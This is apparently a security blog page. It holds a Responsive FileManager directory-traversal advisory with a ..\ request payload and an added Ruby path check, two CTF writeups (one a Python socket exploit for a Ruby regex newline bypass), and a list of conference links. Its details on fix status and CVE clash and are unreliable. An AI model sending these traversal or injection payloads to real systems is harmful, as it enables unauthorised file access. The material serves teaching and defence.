RESPONSIVE filemanager <= 9.10.2 - Directory Traversal
Advisory: Directory Traversal in RESPONSIVE filemanager on Windows Server
During a penetration test, a directory traversal vulnerability was discovered
in RESPONSIVE filemanager. Attackers are able to read arbitrary directories by specifying a
relative path.
Details
=======
Product: RESPONSIVE filemanager
Affected Versions: RESPONSIVE filemanager v9.10.2
Fixed Versions: Not yet
Vulnerability Type: Directory Traversal
Vendor URL: http://www.responsivefilemanager.com/
Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.10.2/responsive_filemanager.zip
Vendor Status: fixed version released
Advisory URL: http://hacktizen.blogspot.com/2016/06/responsive-filemanager-9102-directory.html
Tested on: Windows Server
CVE: CVE-2014-2575
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2575
Attack Detail
[URL]/filemanager/dialog.php?editor=tinymce&type=&lang=&popup=0&field_id=&relative_url=0&akey=key&fldr=..\
fldr=..\..\..\
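The check a defender would want on the fldr parameter, written here in Ruby as an added example rather than as Responsive FileManager's own PHP code: it treats a backslash as a separator, as a Windows host does, and confines the lexically resolved path to an assumed upload root, so the ..\ form shown above is rejected together with ../ . The root path and the function name are assumptions.

```ruby
require "pathname"

# Assumed upload root; the advisory does not name one. A deployment would
# use the file manager's configured upload directory here instead.
UPLOAD_ROOT = "/var/www/source"

# Returns the resolved directory when fldr stays inside root, nil otherwise.
# The check is lexical (no filesystem access); on a live system, also compare
# realpath() results so a symlink inside the root cannot point outside it.
def resolve_folder(root, fldr)
  # A Windows host treats "\" as a separator, so normalise it first:
  # otherwise "..\..\" slips past a filter that only looks for "../".
  normalised = fldr.to_s.tr("\\", "/")
  # NUL bytes truncate paths in C-backed file APIs; refuse them outright.
  return nil if normalised.include?("\0")

  root_path = Pathname.new(root).cleanpath
  # Pathname#+ replaces the root when fldr is absolute, and cleanpath
  # collapses "." and ".." lexically, so the candidate is canonical.
  candidate = (root_path + normalised).cleanpath
  # Compare path components, not string prefixes: "/var/www/source2"
  # must not count as being inside "/var/www/source".
  rel = candidate.relative_path_from(root_path).to_s
  return nil if rel == ".." || rel.start_with?("../")
  candidate.to_s
end

if $PROGRAM_NAME == __FILE__
  puts resolve_folder(UPLOAD_ROOT, "images/2016").inspect  # "/var/www/source/images/2016"
  puts resolve_folder(UPLOAD_ROOT, "..\\..\\..\\").inspect # nil
  puts resolve_folder(UPLOAD_ROOT, "../../../etc").inspect  # nil
end
```

Because the rejection happens after normalisation, a log entry for every nil result gives a detection signal for traversal attempts in either separator style.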
Thursday, 9 June 2016
Monday, 14 March 2016
CODEGATE 2016: JS_is_not_a_jail
JS_is_not_a_jail
nc 175.119.158.131 1129
After connecting to the server, I tried the "quit()" command.
It produced an error that revealed the file path "/home/codegate/cg.js".
I could use the read() feature to read the code.
read('/home/codegate/cg.js')
FLAG:
easy xD, get a harder challenge!
Monday, 22 February 2016
Internetwache 2016 EXP50 Writeup
When I connect to the server at 188.166.133.53:12037,
it shows "Let me count the ascii values of 10 characters:".
I just input some text such as "test", and then it shows an error as below:
"WRONG!!!! Only 10 characters matching /^[a-f]{10}$/ !"
Ruby's regex matching has a known weakness (see the reference below). I wrote the following code to get the flag.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('188.166.133.53', 12037))
# read the server's prompt (it arrives in two pieces)
print s.recv(1024)
print s.recv(1024)
# "ls" on its own line, then ten [a-f] characters: Ruby's ^ and $ match at
# line boundaries, so the second line satisfies /^[a-f]{10}$/ and the
# whole string passes the check.
s.send('ls\naaaaaaaaaa')
print s.recv(1024)
s.close()
Then, the server returns as below:
$ python test.py
Let me count the ascii values of 10 characters:
Sum is: 1203
IW{RUBY_R3G3X_F41L}
FLAG:
IW{RUBY_R3G3X_F41L}
Reference:
http://sakurity.com/blog/2015/06/04/mongo_ruby_regexp.html
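As an added example (not the challenge's server code, which the writeup does not show), the Ruby anchor behaviour the script relies on, beside the anchors that would have closed the hole; the payload and the byte sum come from the transcript above.

```ruby
# The pattern quoted by the challenge. In Ruby, ^ and $ are line anchors:
# they also match right after and right before a newline inside the string.
LINE_ANCHORED = /^[a-f]{10}$/

# \A and \z anchor to the very start and very end of the string, so the
# whole input, newlines included, must be ten characters from a to f.
WHOLE_ANCHORED = /\A[a-f]{10}\z/

# Constructed payload: the same string the script above sends.
PAYLOAD = "ls\naaaaaaaaaa"

def accepted_by_line_anchors?(input)
  !(input =~ LINE_ANCHORED).nil?
end

def accepted_by_whole_anchors?(input)
  !(input =~ WHOLE_ANCHORED).nil?
end

# The "Sum is:" value the server printed is the byte sum of everything that
# reached it: for "ls\naaaaaaaaaa" that is 108 + 115 + 10 + 10*97 = 1203,
# which shows the "ls" line passed the filter along with the ten letters.
def ascii_sum(input)
  input.bytes.sum
end

if $PROGRAM_NAME == __FILE__
  puts "line anchors accept payload:  #{accepted_by_line_anchors?(PAYLOAD)}"  # true
  puts "whole anchors accept payload: #{accepted_by_whole_anchors?(PAYLOAD)}" # false
  puts "byte sum of payload:          #{ascii_sum(PAYLOAD)}"                  # 1203
end
```

Note that \Z (capital) still tolerates one trailing newline, so the fix is \A with lowercase \z.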
Wednesday, 13 January 2016
List of all the security conferences in 2015 (or older)
Reference: https://www.reddit.com/r/netsec/comments/40i06f/i_put_together_a_list_of_all_the_security/
1. Security Conferences from 2015
https://www.tunnelsup.com/online-security-conferences/
2. NorthSec, Montreal, Canada
https://www.youtube.com/playlist?list=PLuUtcRxSUZUpQAa54H6PKkfX6A48ruzhh
3. 32C3
https://www.youtube.com/playlist?list=PL_IxoDz1Nq2YahR4DU9q5GWsSTle-mETW
4. PS4 Booting and running Linux
https://www.youtube.com/watch?v=PQFNnr6Ly9M
5. Metcalf - Modern Active Directory Attacks (Black Hat USA 2015)
https://www.youtube.com/watch?v=b6GUXerE9Ac&list=PLH15HpR5qRsXF78lrpWP2JKpPJs_AFnD7&index=42
6. Rob Fuller - Basic Security
https://www.youtube.com/watch?v=TqbGNFfl1d8
7. SteelCon (Sheffield, UK, July 3-5 2015)
https://www.youtube.com/playlist?list=PLmfJypsykTLX9mDeChQ7fovybwYzQgr6j
8. ekoparty 2015
https://vimeo.com/album/3682874
9. OWASP AppSec EU and CA
https://www.youtube.com/playlist?list=PLpr-xdpM8wG93dG_L9QKs0W1cD-esQEzU
10. Crypto 2015
https://m.youtube.com/playlist?list=PLeeS-3Ml-rpoNWewUnljPP7QN4USn4c7H
http://www.iacr.org/conferences/crypto2015/
11. BSides Orlando (April 11-12, 2015)
https://www.youtube.com/playlist?list=PLu1bAtIWt2VbXiy4kNWdtVkWiRWvPoeD6
12. BruCON as well (26-27 October)
https://www.youtube.com/user/brucontalks
13. USENIX Security '15
https://www.youtube.com/playlist?list=PLbRoZ5Rrl5lfeRixThHzgGYj1wu80JOh3
14. Brucon (Belgium)
https://www.youtube.com/playlist?list=PLtb1FJdVWjUfZ9fWxPPCrOO7LUquB3WrB
15. CERT.pl's Secure 2015
https://www.youtube.com/playlist?list=PLghf5UNZbzG0zLarfwpw4PxPTS0IWo8vB
16. CornCon
https://www.youtube.com/channel/UCP2fm3Wg8LacmD96N7CkOBA/videos?sort=dd&view=0&shelf_id=0
17. BSides Charleston
https://www.youtube.com/user/bsideschs/videos
18. SaintCON 2015 at Weber State University in Ogden UT
https://www.youtube.com/channel/UCEiHGeWgdIoLCzTLm_izCoQ
19. BSidesSLC that will be in Salt Lake City 2016
https://www.youtube.com/channel/UCuJ0qrx-oNq2hxrUX5IYd9A
20. syscan
https://www.youtube.com/channel/UCx5hZiie0VzFvV-u376v7DQ
21. Brocon 2015
https://www.youtube.com/playlist?list=PL2EYTX8UVCMhwxWH1IklKkV64YX_0Xcoo
22. CarolinaCon
https://www.youtube.com/user/CarolinaConVideos/videos
23. Bsides Lisbon 2015
https://www.youtube.com/channel/UC_M0dk4dvcBr_rFgi710D4Q